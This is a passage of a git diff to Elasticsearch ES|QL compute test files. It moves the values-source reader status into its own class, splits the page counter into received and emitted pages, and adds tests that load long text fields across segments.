ValuesSourceReaderOperatorStatus status = (ValuesSourceReaderOperatorStatus) op.status(); + assertThat(status.pagesReceived(), equalTo(input.size())); + assertThat(status.pagesEmitted(), equalTo(input.size())); } assertDriverContext(driverContext); } @@ -709,15 +727,16 @@ private void testLoadAllStatus(boolean allInOnePage) { Block.MvOrdering.DEDUPLICATED_AND_SORTED_ASCENDING ); List operators = cases.stream() - .map(i -> new ValuesSourceReaderOperator.Factory(List.of(i.info), shardContexts, 0).get(driverContext)) + .map(i -> new ValuesSourceReaderOperator.Factory(ByteSizeValue.ofGb(1), List.of(i.info), shardContexts, 0).get(driverContext)) .toList(); if (allInOnePage) { input = List.of(CannedSourceOperator.mergePages(input)); } drive(operators, input.iterator(), driverContext); for (int i = 0; i < cases.size(); i++) { - ValuesSourceReaderOperator.Status status = (ValuesSourceReaderOperator.Status) operators.get(i).status(); - assertThat(status.pagesProcessed(), equalTo(input.size())); + ValuesSourceReaderOperatorStatus status = (ValuesSourceReaderOperatorStatus) operators.get(i).status(); + assertThat(status.pagesReceived(), equalTo(input.size())); + assertThat(status.pagesEmitted(), equalTo(input.size())); FieldCase fc = cases.get(i); fc.checkReaders.check(fc.info.name(), allInOnePage, input.size(), totalSize, status.readersBuilt()); } @@ -1380,6 +1399,7 @@ public void testNullsShared() { simpleInput(driverContext, 10), List.of( new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), List.of( new ValuesSourceReaderOperator.FieldInfo("null1", ElementType.NULL, shardIdx -> BlockLoader.CONSTANT_NULLS), new ValuesSourceReaderOperator.FieldInfo("null2", ElementType.NULL, shardIdx -> BlockLoader.CONSTANT_NULLS) @@ -1414,6 +1434,7 @@ public void testDescriptionOfMany() throws IOException { List cases = infoAndChecksForEachType(ordering, ordering); ValuesSourceReaderOperator.Factory factory = new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), cases.stream().map(c -> c.info).toList(), List.of(new ValuesSourceReaderOperator.ShardContext(reader(indexKey), () -> SourceLoader.FROM_STORED_SOURCE, 0.2)), 0 @@ -1459,6 +1480,7 @@ public void testManyShards() throws IOException { // TODO add index2 MappedFieldType ft = mapperService(indexKey).fieldType("key"); var readerFactory = new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), List.of(new ValuesSourceReaderOperator.FieldInfo("key", ElementType.INT, shardIdx -> { seenShards.add(shardIdx); return ft.blockLoader(blContext()); @@ -1641,6 +1663,11 @@ public org.elasticsearch.compute.data.Block eval(Page page) { return blockConverter.convert(block); } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() {} }; @@ -1666,8 +1693,8 @@ public ColumnAtATimeReader columnAtATimeReader(LeafReaderContext context) throws } return new ColumnAtATimeReader() { @Override - public Block read(BlockFactory factory, Docs docs) throws IOException { - Block block = reader.read(factory, docs); + public Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + Block block = reader.read(factory, docs, offset); Page page = new Page((org.elasticsearch.compute.data.Block) block); return convertEvaluator.eval(page); } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/ValuesSourceReaderOperatorStatusTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperatorStatusTests.java similarity index 60% rename from x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/ValuesSourceReaderOperatorStatusTests.java rename to x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperatorStatusTests.java index af1463b88c62c..f81398eb67695 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/ValuesSourceReaderOperatorStatusTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperatorStatusTests.java @@ -5,7 +5,7 @@ * 2.0. */ -package org.elasticsearch.compute.lucene; +package org.elasticsearch.compute.lucene.read; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.Writeable; @@ -18,9 +18,9 @@ import static org.hamcrest.Matchers.equalTo; -public class ValuesSourceReaderOperatorStatusTests extends AbstractWireSerializingTestCase { - public static ValuesSourceReaderOperator.Status simple() { - return new ValuesSourceReaderOperator.Status(Map.of("ReaderType", 3), 1022323, 123, 111, 222, 1000); +public class ValuesSourceReaderOperatorStatusTests extends AbstractWireSerializingTestCase { + public static ValuesSourceReaderOperatorStatus simple() { + return new ValuesSourceReaderOperatorStatus(Map.of("ReaderType", 3), 1022323, 123, 200, 111, 222, 1000); } public static String simpleToJson() { @@ -32,7 +32,8 @@ public static String simpleToJson() { "values_loaded" : 1000, "process_nanos" : 1022323, "process_time" : "1ms", - "pages_processed" : 123, + "pages_received" : 123, + "pages_emitted" : 200, "rows_received" : 111, "rows_emitted" : 222 }"""; @@ -43,16 +44,17 @@ public void testToXContent() { } @Override - protected Writeable.Reader instanceReader() { - return ValuesSourceReaderOperator.Status::new; + protected Writeable.Reader instanceReader() { + return ValuesSourceReaderOperatorStatus::readFrom; } @Override - public ValuesSourceReaderOperator.Status createTestInstance() { - return new ValuesSourceReaderOperator.Status( + public ValuesSourceReaderOperatorStatus createTestInstance() { + return new ValuesSourceReaderOperatorStatus( randomReadersBuilt(), randomNonNegativeLong(), randomNonNegativeInt(), + randomNonNegativeInt(), randomNonNegativeLong(), randomNonNegativeLong(), randomNonNegativeLong() @@ -69,22 +71,32 @@ private Map randomReadersBuilt() { } @Override - protected ValuesSourceReaderOperator.Status mutateInstance(ValuesSourceReaderOperator.Status instance) throws IOException { + protected ValuesSourceReaderOperatorStatus mutateInstance(ValuesSourceReaderOperatorStatus instance) throws IOException { Map readersBuilt = instance.readersBuilt(); long processNanos = instance.processNanos(); - int pagesProcessed = instance.pagesProcessed(); + int pagesReceived = instance.pagesReceived(); + int pagesEmitted = instance.pagesEmitted(); long rowsReceived = instance.rowsReceived(); long rowsEmitted = instance.rowsEmitted(); long valuesLoaded = instance.valuesLoaded(); - switch (between(0, 5)) { + switch (between(0, 6)) { case 0 -> readersBuilt = randomValueOtherThan(readersBuilt, this::randomReadersBuilt); case 1 -> processNanos = randomValueOtherThan(processNanos, ESTestCase::randomNonNegativeLong); - case 2 -> pagesProcessed = randomValueOtherThan(pagesProcessed, ESTestCase::randomNonNegativeInt); - case 3 -> rowsReceived = randomValueOtherThan(rowsReceived, ESTestCase::randomNonNegativeLong); - case 4 -> rowsEmitted = randomValueOtherThan(rowsEmitted, ESTestCase::randomNonNegativeLong); - case 5 -> valuesLoaded = randomValueOtherThan(valuesLoaded, ESTestCase::randomNonNegativeLong); + case 2 -> pagesReceived = randomValueOtherThan(pagesReceived, ESTestCase::randomNonNegativeInt); + case 3 -> pagesEmitted = randomValueOtherThan(pagesEmitted, ESTestCase::randomNonNegativeInt); + case 4 -> rowsReceived = randomValueOtherThan(rowsReceived, ESTestCase::randomNonNegativeLong); + case 5 -> rowsEmitted = randomValueOtherThan(rowsEmitted, ESTestCase::randomNonNegativeLong); + case 6 -> valuesLoaded = randomValueOtherThan(valuesLoaded, ESTestCase::randomNonNegativeLong); default -> throw new UnsupportedOperationException(); } - return new ValuesSourceReaderOperator.Status(readersBuilt, processNanos, pagesProcessed, rowsReceived, rowsEmitted, valuesLoaded); + return new ValuesSourceReaderOperatorStatus( + readersBuilt, + processNanos, + pagesReceived, + pagesEmitted, + rowsReceived, + rowsEmitted, + valuesLoaded + ); } } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/ValuesSourceReaderOperatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperatorTests.java similarity index 88% rename from x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/ValuesSourceReaderOperatorTests.java rename to x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperatorTests.java index 1550b6dc013ab..19a645c146242 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/ValuesSourceReaderOperatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperatorTests.java @@ -5,7 +5,7 @@ * 2.0. */ -package org.elasticsearch.compute.lucene; +package org.elasticsearch.compute.lucene.read; import org.apache.lucene.document.Document; import org.apache.lucene.document.DoubleDocValuesField; @@ -18,6 +18,7 @@ import org.apache.lucene.index.IndexWriter; import org.apache.lucene.index.IndexWriterConfig; import org.apache.lucene.index.NoMergePolicy; +import org.apache.lucene.index.TieredMergePolicy; import org.apache.lucene.search.MatchAllDocsQuery; import org.apache.lucene.store.Directory; import org.apache.lucene.tests.index.RandomIndexWriter; @@ -37,6 +38,7 @@ import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; import org.elasticsearch.compute.data.DocBlock; +import org.elasticsearch.compute.data.DocVector; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; import org.elasticsearch.compute.data.ElementType; @@ -45,6 +47,12 @@ import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.lucene.DataPartitioning; +import org.elasticsearch.compute.lucene.LuceneOperator; +import org.elasticsearch.compute.lucene.LuceneSliceQueue; +import org.elasticsearch.compute.lucene.LuceneSourceOperator; +import org.elasticsearch.compute.lucene.LuceneSourceOperatorTests; +import org.elasticsearch.compute.lucene.ShardContext; import org.elasticsearch.compute.operator.Driver; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.Operator; @@ -93,6 +101,7 @@ import static org.elasticsearch.test.MapMatcher.matchesMap; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.greaterThan; +import static org.hamcrest.Matchers.greaterThanOrEqualTo; import static org.hamcrest.Matchers.hasSize; import static org.hamcrest.Matchers.lessThanOrEqualTo; import static org.hamcrest.Matchers.not; @@ -144,12 +153,14 @@ public static Operator.OperatorFactory factory(IndexReader reader, MappedFieldTy } static Operator.OperatorFactory factory(IndexReader reader, String name, ElementType elementType, BlockLoader loader) { - return new ValuesSourceReaderOperator.Factory(List.of(new ValuesSourceReaderOperator.FieldInfo(name, elementType, shardIdx -> { - if (shardIdx != 0) { - fail("unexpected shardIdx [" + shardIdx + "]"); - } - return loader; - })), + return new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), + List.of(new ValuesSourceReaderOperator.FieldInfo(name, elementType, shardIdx -> { + if (shardIdx != 0) { + fail("unexpected shardIdx [" + shardIdx + "]"); + } + return loader; + })), List.of( new ValuesSourceReaderOperator.ShardContext( reader, @@ -176,6 +187,10 @@ private SourceOperator simpleInput(DriverContext context, int size, int commitEv } catch (IOException e) { throw new RuntimeException(e); } + return sourceOperator(context, pageSize); + } + + private SourceOperator sourceOperator(DriverContext context, int pageSize) { var luceneFactory = new LuceneSourceOperator.Factory( List.of(new LuceneSourceOperatorTests.MockShardContext(reader, 0)), ctx -> List.of(new LuceneSliceQueue.QueryAndTags(new MatchAllDocsQuery(), List.of())), @@ -205,6 +220,7 @@ private void initMapping() throws IOException { simpleField(b, "missing_text", "text"); b.startObject("source_text").field("type", "text").field("store", false).endObject(); b.startObject("mv_source_text").field("type", "text").field("store", false).endObject(); + b.startObject("long_source_text").field("type", "text").field("store", false).endObject(); b.startObject("stored_text").field("type", "text").field("store", true).endObject(); b.startObject("mv_stored_text").field("type", "text").field("store", true).endObject(); @@ -380,6 +396,37 @@ private IndexReader initIndex(Directory directory, int size, int commitEvery) th return DirectoryReader.open(directory); } + private IndexReader initIndexLongField(Directory directory, int size, int commitEvery, boolean forceMerge) throws IOException { + try ( + IndexWriter writer = new IndexWriter( + directory, + newIndexWriterConfig().setMergePolicy(new TieredMergePolicy()).setMaxBufferedDocs(IndexWriterConfig.DISABLE_AUTO_FLUSH) + ) + ) { + for (int d = 0; d < size; d++) { + XContentBuilder source = JsonXContent.contentBuilder(); + source.startObject(); + source.field("long_source_text", d + "#" + "a".repeat(100 * 1024)); + source.endObject(); + ParsedDocument doc = mapperService.documentParser() + .parseDocument( + new SourceToParse("id" + d, BytesReference.bytes(source), XContentType.JSON), + mapperService.mappingLookup() + ); + writer.addDocuments(doc.docs()); + + if (d % commitEvery == commitEvery - 1) { + writer.commit(); + } + } + + if (forceMerge) { + writer.forceMerge(1); + } + } + return DirectoryReader.open(directory); + } + @Override protected Matcher expectedDescriptionOfSimple() { return equalTo("ValuesSourceReaderOperator[fields = [long]]"); @@ -408,12 +455,6 @@ protected void assertSimpleOutput(List input, List results) { assertThat(sum, equalTo(expectedSum)); } - @Override - protected ByteSizeValue enoughMemoryForSimple() { - assumeFalse("strange exception in the test, fix soon", true); - return ByteSizeValue.ofKb(1); - } - public void testLoadAll() { DriverContext driverContext = driverContext(); loadSimpleAndAssert( @@ -453,6 +494,7 @@ public void testManySingleDocPages() { ); operators.add( new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), List.of(testCase.info, fieldInfo(mapperService.fieldType("key"), ElementType.INT)), List.of( new ValuesSourceReaderOperator.ShardContext( @@ -491,16 +533,23 @@ public void testLoadAllInOnePageShuffled() { Page source = CannedSourceOperator.mergePages( CannedSourceOperator.collectPages(simpleInput(driverContext.blockFactory(), between(100, 5000))) ); - List shuffleList = new ArrayList<>(); - IntStream.range(0, source.getPositionCount()).forEach(i -> shuffleList.add(i)); - Randomness.shuffle(shuffleList); - int[] shuffleArray = shuffleList.stream().mapToInt(Integer::intValue).toArray(); - Block[] shuffledBlocks = new Block[source.getBlockCount()]; - for (int b = 0; b < shuffledBlocks.length; b++) { - shuffledBlocks[b] = source.getBlock(b).filter(shuffleArray); - } - source = new Page(shuffledBlocks); - loadSimpleAndAssert(driverContext, List.of(source), Block.MvOrdering.UNORDERED, Block.MvOrdering.UNORDERED); + loadSimpleAndAssert(driverContext, List.of(shuffle(source)), Block.MvOrdering.UNORDERED, Block.MvOrdering.UNORDERED); + } + + private Page shuffle(Page source) { + try { + List shuffleList = new ArrayList<>(); + IntStream.range(0, source.getPositionCount()).forEach(i -> shuffleList.add(i)); + Randomness.shuffle(shuffleList); + int[] shuffleArray = shuffleList.stream().mapToInt(Integer::intValue).toArray(); + Block[] shuffledBlocks = new Block[source.getBlockCount()]; + for (int b = 0; b < shuffledBlocks.length; b++) { + shuffledBlocks[b] = source.getBlock(b).filter(shuffleArray); + } + return new Page(shuffledBlocks); + } finally { + source.releaseBlocks(); + } } private static ValuesSourceReaderOperator.FieldInfo fieldInfo(MappedFieldType ft, ElementType elementType) { @@ -565,6 +614,7 @@ private void loadSimpleAndAssert( List operators = new ArrayList<>(); operators.add( new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), List.of(fieldInfo(mapperService.fieldType("key"), ElementType.INT)), List.of( new ValuesSourceReaderOperator.ShardContext( @@ -583,6 +633,7 @@ private void loadSimpleAndAssert( tests.addAll(b); operators.add( new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), b.stream().map(i -> i.info).toList(), List.of( new ValuesSourceReaderOperator.ShardContext( @@ -612,7 +663,9 @@ private void loadSimpleAndAssert( } } for (Operator op : operators) { - assertThat(((ValuesSourceReaderOperator) op).status().pagesProcessed(), equalTo(input.size())); + ValuesSourceReaderOperatorStatus status = (ValuesSourceReaderOperatorStatus) op.status(); + assertThat(status.pagesReceived(), equalTo(input.size())); + assertThat(status.pagesEmitted(), equalTo(input.size())); } assertDriverContext(driverContext); } @@ -679,6 +732,7 @@ private void testLoadAllStatus(boolean allInOnePage) { List operators = cases.stream() .map( i -> new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), List.of(i.info), List.of( new ValuesSourceReaderOperator.ShardContext( @@ -696,8 +750,9 @@ private void testLoadAllStatus(boolean allInOnePage) { } drive(operators, input.iterator(), driverContext); for (int i = 0; i < cases.size(); i++) { - ValuesSourceReaderOperator.Status status = (ValuesSourceReaderOperator.Status) operators.get(i).status(); - assertThat(status.pagesProcessed(), equalTo(input.size())); + ValuesSourceReaderOperatorStatus status = (ValuesSourceReaderOperatorStatus) operators.get(i).status(); + assertThat(status.pagesReceived(), equalTo(input.size())); + assertThat(status.pagesEmitted(), equalTo(input.size())); FieldCase fc = cases.get(i); fc.checkReaders.check(fc.info.name(), allInOnePage, input.size(), reader.leaves().size(), status.readersBuilt()); } @@ -863,6 +918,117 @@ private List infoAndChecksForEachType( return r; } + public void testLoadLong() throws IOException { + testLoadLong(false, false); + } + + public void testLoadLongManySegments() throws IOException { + testLoadLong(false, true); + } + + public void testLoadLongShuffled() throws IOException { + testLoadLong(true, false); + } + + public void testLoadLongShuffledManySegments() throws IOException { + testLoadLong(true, true); + } + + private void testLoadLong(boolean shuffle, boolean manySegments) throws IOException { + int numDocs = between(10, 500); + initMapping(); + reader = initIndexLongField(directory, numDocs, manySegments ? commitEvery(numDocs) : numDocs, manySegments == false); + + DriverContext driverContext = driverContext(); + List input = CannedSourceOperator.collectPages(sourceOperator(driverContext, numDocs)); + assertThat(reader.leaves(), hasSize(manySegments ? greaterThan(5) : equalTo(1))); + assertThat(input, hasSize(reader.leaves().size())); + if (manySegments) { + input = List.of(CannedSourceOperator.mergePages(input)); + } + if (shuffle) { + input = input.stream().map(this::shuffle).toList(); + } + boolean willSplit = loadLongWillSplit(input); + + Checks checks = new Checks(Block.MvOrdering.DEDUPLICATED_AND_SORTED_ASCENDING, Block.MvOrdering.DEDUPLICATED_AND_SORTED_ASCENDING); + + List cases = List.of( + new FieldCase( + mapperService.fieldType("long_source_text"), + ElementType.BYTES_REF, + checks::strings, + StatusChecks::longTextFromSource + ) + ); + // Build one operator for each field, so we get a unique map to assert on + List operators = cases.stream() + .map( + i -> new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), + List.of(i.info), + List.of( + new ValuesSourceReaderOperator.ShardContext( + reader, + () -> SourceLoader.FROM_STORED_SOURCE, + STORED_FIELDS_SEQUENTIAL_PROPORTIONS + ) + ), + 0 + ).get(driverContext) + ) + .toList(); + List result = drive(operators, input.iterator(), driverContext); + + boolean[] found = new boolean[numDocs]; + for (Page page : result) { + BytesRefVector bytes = page.getBlock(1).asVector(); + BytesRef scratch = new BytesRef(); + for (int p = 0; p < bytes.getPositionCount(); p++) { + BytesRef v = bytes.getBytesRef(p, scratch); + int d = Integer.valueOf(v.utf8ToString().split("#")[0]); + assertFalse("found a duplicate " + d, found[d]); + found[d] = true; + } + } + List missing = new ArrayList<>(); + for (int d = 0; d < numDocs; d++) { + if (found[d] == false) { + missing.add(d); + } + } + assertThat(missing, hasSize(0)); + assertThat(result, hasSize(willSplit ? greaterThanOrEqualTo(input.size()) : equalTo(input.size()))); + + for (int i = 0; i < cases.size(); i++) { + ValuesSourceReaderOperatorStatus status = (ValuesSourceReaderOperatorStatus) operators.get(i).status(); + assertThat(status.pagesReceived(), equalTo(input.size())); + assertThat(status.pagesEmitted(), willSplit ? greaterThanOrEqualTo(input.size()) : equalTo(input.size())); + } + } + + private boolean loadLongWillSplit(List input) { + int nextDoc = -1; + for (Page page : input) { + DocVector doc = page.getBlock(0).asVector(); + for (int p = 0; p < doc.getPositionCount(); p++) { + if (doc.shards().getInt(p) != 0) { + return false; + } + if (doc.segments().getInt(p) != 0) { + return false; + } + if (nextDoc == -1) { + nextDoc = doc.docs().getInt(p); + } else if (doc.docs().getInt(p) != nextDoc) { + return false; + } + nextDoc++; + } + } + return true; + } + record Checks(Block.MvOrdering booleanAndNumericalDocValuesMvOrdering, Block.MvOrdering bytesRefDocValuesMvOrdering) { void longs(Block block, int position, int key) { LongVector longs = ((LongBlock) block).asVector(); @@ -1076,6 +1242,10 @@ static void textFromSource(boolean forcedRowByRow, int pageCount, int segmentCou source("source_text", "Bytes", forcedRowByRow, pageCount, segmentCount, readers); } + static void longTextFromSource(boolean forcedRowByRow, int pageCount, int segmentCount, Map readers) { + source("long_source_text", "Bytes", forcedRowByRow, pageCount, segmentCount, readers); + } + static void textFromStored(boolean forcedRowByRow, int pageCount, int segmentCount, Map readers) { stored("stored_text", "Bytes", forcedRowByRow, pageCount, segmentCount, readers); } @@ -1448,6 +1618,7 @@ public void testNullsShared() { simpleInput(driverContext.blockFactory(), 10), List.of( new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), List.of( new ValuesSourceReaderOperator.FieldInfo("null1", ElementType.NULL, shardIdx -> BlockLoader.CONSTANT_NULLS), new ValuesSourceReaderOperator.FieldInfo("null2", ElementType.NULL, shardIdx -> BlockLoader.CONSTANT_NULLS) @@ -1482,13 +1653,13 @@ public void testNullsShared() { } public void testSequentialStoredFieldsTooSmall() throws IOException { - testSequentialStoredFields(false, between(1, ValuesSourceReaderOperator.SEQUENTIAL_BOUNDARY - 1)); + testSequentialStoredFields(false, between(1, ValuesFromSingleReader.SEQUENTIAL_BOUNDARY - 1)); } public void testSequentialStoredFieldsBigEnough() throws IOException { testSequentialStoredFields( true, - between(ValuesSourceReaderOperator.SEQUENTIAL_BOUNDARY, ValuesSourceReaderOperator.SEQUENTIAL_BOUNDARY * 2) + between(ValuesFromSingleReader.SEQUENTIAL_BOUNDARY, ValuesFromSingleReader.SEQUENTIAL_BOUNDARY * 2) ); } @@ -1499,6 +1670,7 @@ private void testSequentialStoredFields(boolean sequential, int docCount) throws assertThat(source, hasSize(1)); // We want one page for simpler assertions, and we want them all in one segment assertTrue(source.get(0).getBlock(0).asVector().singleSegmentNonDecreasing()); Operator op = new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), List.of( fieldInfo(mapperService.fieldType("key"), ElementType.INT), fieldInfo(storedTextField("stored_text"), ElementType.BYTES_REF) @@ -1519,7 +1691,7 @@ private void testSequentialStoredFields(boolean sequential, int docCount) throws int key = keys.getInt(p); checks.strings(results.get(0).getBlock(2), p, key); } - ValuesSourceReaderOperator.Status status = (ValuesSourceReaderOperator.Status) op.status(); + ValuesSourceReaderOperatorStatus status = (ValuesSourceReaderOperatorStatus) op.status(); assertMap( status.readersBuilt(), matchesMap().entry("key:column_at_a_time:BlockDocValuesReader.SingletonInts", 1) @@ -1536,6 +1708,7 @@ public void testDescriptionOfMany() throws IOException { List cases = infoAndChecksForEachType(ordering, ordering); ValuesSourceReaderOperator.Factory factory = new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), cases.stream().map(c -> c.info).toList(), List.of( new ValuesSourceReaderOperator.ShardContext( @@ -1589,6 +1762,7 @@ public void testManyShards() throws IOException { ); MappedFieldType ft = mapperService.fieldType("key"); var readerFactory = new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), List.of(new ValuesSourceReaderOperator.FieldInfo("key", ElementType.INT, shardIdx -> { seenShards.add(shardIdx); return ft.blockLoader(blContext()); diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/AddGarbageRowsSourceOperator.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/AddGarbageRowsSourceOperator.java index 079be87161421..c035430433b1e 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/AddGarbageRowsSourceOperator.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/AddGarbageRowsSourceOperator.java @@ -39,6 +39,11 @@ public Block eval(Page page) { return block; } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() {} }; diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/ColumnExtractOperatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/ColumnExtractOperatorTests.java index f3bc02ffe5845..c43c8540c9928 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/ColumnExtractOperatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/ColumnExtractOperatorTests.java @@ -65,6 +65,11 @@ public Block eval(Page page) { return input; } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() {} }, diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverProfileTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverProfileTests.java index c8f8094f69c27..016997369d403 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverProfileTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverProfileTests.java @@ -12,8 +12,8 @@ import org.elasticsearch.common.io.stream.Writeable; import org.elasticsearch.compute.lucene.LuceneSourceOperator; import org.elasticsearch.compute.lucene.LuceneSourceOperatorStatusTests; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperator; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperatorStatusTests; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperatorStatus; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperatorStatusTests; import org.elasticsearch.compute.operator.exchange.ExchangeSinkOperator; import org.elasticsearch.test.AbstractWireSerializingTestCase; import org.elasticsearch.test.ESTestCase; @@ -166,7 +166,7 @@ protected DriverProfile mutateInstance(DriverProfile instance) throws IOExceptio @Override protected NamedWriteableRegistry getNamedWriteableRegistry() { return new NamedWriteableRegistry( - List.of(LuceneSourceOperator.Status.ENTRY, ValuesSourceReaderOperator.Status.ENTRY, ExchangeSinkOperator.Status.ENTRY) + List.of(LuceneSourceOperator.Status.ENTRY, ValuesSourceReaderOperatorStatus.ENTRY, ExchangeSinkOperator.Status.ENTRY) ); } } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverStatusTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverStatusTests.java index df3583d0c99bd..c990fb99cd7dd 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverStatusTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverStatusTests.java @@ -12,8 +12,8 @@ import org.elasticsearch.common.io.stream.Writeable; import org.elasticsearch.compute.lucene.LuceneSourceOperator; import org.elasticsearch.compute.lucene.LuceneSourceOperatorStatusTests; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperator; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperatorStatusTests; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperatorStatus; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperatorStatusTests; import org.elasticsearch.compute.operator.exchange.ExchangeSinkOperator; import org.elasticsearch.compute.operator.exchange.ExchangeSinkOperatorStatusTests; import org.elasticsearch.test.AbstractWireSerializingTestCase; @@ -202,7 +202,7 @@ protected DriverStatus mutateInstance(DriverStatus instance) throws IOException @Override protected NamedWriteableRegistry getNamedWriteableRegistry() { return new NamedWriteableRegistry( - List.of(LuceneSourceOperator.Status.ENTRY, ValuesSourceReaderOperator.Status.ENTRY, ExchangeSinkOperator.Status.ENTRY) + List.of(LuceneSourceOperator.Status.ENTRY, ValuesSourceReaderOperatorStatus.ENTRY, ExchangeSinkOperator.Status.ENTRY) ); } } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverTests.java index c538cf41ee1fd..46aba449fcb90 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverTests.java @@ -49,6 +49,8 @@ import static org.hamcrest.Matchers.either; import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.not; +import static org.hamcrest.Matchers.sameInstance; public class DriverTests extends ESTestCase { /** @@ -204,6 +206,47 @@ public void testProfileAndStatusInterval() { assertThat(driver.profile().iterations(), equalTo((long) inPages.size())); } + public void testUnchangedStatus() { + DriverContext driverContext = driverContext(); + List inPages = randomList(2, 100, DriverTests::randomPage); + List outPages = new ArrayList<>(); + + long startEpoch = randomNonNegativeLong(); + long startNanos = randomLong(); + long waitTime = randomLongBetween(10000, 100000); + long tickTime = randomLongBetween(10000, 100000); + long statusInterval = randomLongBetween(1, 10); + + Driver driver = createDriver(startEpoch, startNanos, driverContext, inPages, outPages, TimeValue.timeValueNanos(statusInterval)); + + NowSupplier nowSupplier = new NowSupplier(startNanos, waitTime, tickTime); + + int iterationsPerTick = randomIntBetween(1, 10); + + for (int i = 0; i < inPages.size(); i += iterationsPerTick) { + DriverStatus initialStatus = driver.status(); + long completedOperatorsHash = initialStatus.completedOperators().hashCode(); + long activeOperatorsHash = initialStatus.activeOperators().hashCode(); + long sleepsHash = initialStatus.sleeps().hashCode(); + + driver.run(TimeValue.timeValueDays(10), iterationsPerTick, nowSupplier); + + DriverStatus newStatus = driver.status(); + assertThat(newStatus, not(sameInstance(initialStatus))); + assertThat( + newStatus.completedOperators() != initialStatus.completedOperators() + || newStatus.completedOperators().hashCode() == completedOperatorsHash, + equalTo(true) + ); + assertThat( + newStatus.activeOperators() != initialStatus.activeOperators() + || newStatus.activeOperators().hashCode() == activeOperatorsHash, + equalTo(true) + ); + assertThat(newStatus.sleeps() != initialStatus.sleeps() || newStatus.sleeps().hashCode() == sleepsHash, equalTo(true)); + } + } + private static Driver createDriver( long startEpoch, long startNanos, @@ -328,7 +371,7 @@ public void testEarlyTermination() { final AtomicInteger processedRows = new AtomicInteger(0); var sinkHandler = new ExchangeSinkHandler(driverContext.blockFactory(), positions, System::currentTimeMillis); var 